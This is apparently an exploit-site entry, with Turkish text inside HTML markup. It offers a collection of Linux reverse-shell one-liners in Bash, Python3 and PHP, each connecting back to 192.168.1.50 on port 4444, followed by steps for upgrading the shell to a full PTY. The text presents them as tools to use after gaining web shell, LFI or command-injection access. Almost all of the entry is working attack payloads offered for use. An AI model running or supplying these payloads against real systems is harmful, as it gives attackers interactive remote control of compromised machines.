VULN REPORT
/
shellcode
/
ID: 256
Linux x64 Reverse Shell One-Liner Koleksiyonu - Cok Dilli
Summary
This entry details a vulnerability found in the target system. The exploit was published on 2026-07-21 and has garnered 35 views from the community. It is classified under the shellcode category. Users are advised to review the source code in the Detail tab for technical specifics.
exploit_256.txt
<div class="space-y-8 text-slate-800 font-sans leading-relaxed">
<div class="border-l-4 border-sky-500 pl-5 py-3 bg-sky-50/60 rounded-r-xl">
<p class="text-xs font-bold uppercase tracking-widest text-sky-700 mb-1">Modern Teknik - Cok Dilli - Reverse Shell</p>
<h2 class="text-2xl font-extrabold text-slate-900 leading-tight">Linux Reverse Shell One-Liner Koleksiyonu</h2>
<p class="text-sm text-slate-600 mt-2">Web shell erisimi, LFI veya komut enjeksiyonu durumunda yorumlanan dillerdeki tek satir komutlar etkili reverse shell saglar.</p>
</div>
<div>
<h3 class="text-xl font-bold text-slate-900 border-b border-slate-200 pb-2 mb-4">Bash</h3>
<div class="bg-slate-900 text-slate-300 p-4 rounded-xl font-mono text-xs overflow-x-auto shadow-inner leading-5">
bash -i >& /dev/tcp/192.168.1.50/4444 0>&1
# Alternatif:
exec 5<>/dev/tcp/192.168.1.50/4444
cat <&5 | while read l; do $l 2>&5 >&5; done
</div>
</div>
<div>
<h3 class="text-xl font-bold text-slate-900 border-b border-slate-200 pb-2 mb-4">Python3</h3>
<div class="bg-slate-900 text-yellow-300 p-4 rounded-xl font-mono text-xs overflow-x-auto shadow-inner leading-5">
python3 -c '
import socket,os,pty
s=socket.socket()
s.connect(("192.168.1.50",4444))
[os.dup2(s.fileno(),i) for i in range(3)]
pty.spawn("/bin/bash")'
</div>
</div>
<div>
<h3 class="text-xl font-bold text-slate-900 border-b border-slate-200 pb-2 mb-4">PHP</h3>
<div class="bg-slate-900 text-cyan-300 p-4 rounded-xl font-mono text-xs overflow-x-auto shadow-inner leading-5">
php -r '$s=fsockopen("192.168.1.50",4444);$p=proc_open("/bin/sh -i",array(0=>$s,1=>$s,2=>$s),$pi);'
</div>
</div>
<div>
<h3 class="text-xl font-bold text-slate-900 border-b border-slate-200 pb-2 mb-4">PTY Upgrade</h3>
<div class="bg-slate-900 text-slate-300 p-4 rounded-xl font-mono text-xs overflow-x-auto shadow-inner leading-5">
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm
stty rows 40 columns 200
</div>
</div>
</div>
Entry Stats
Views
35
Downloads
10
Comments
0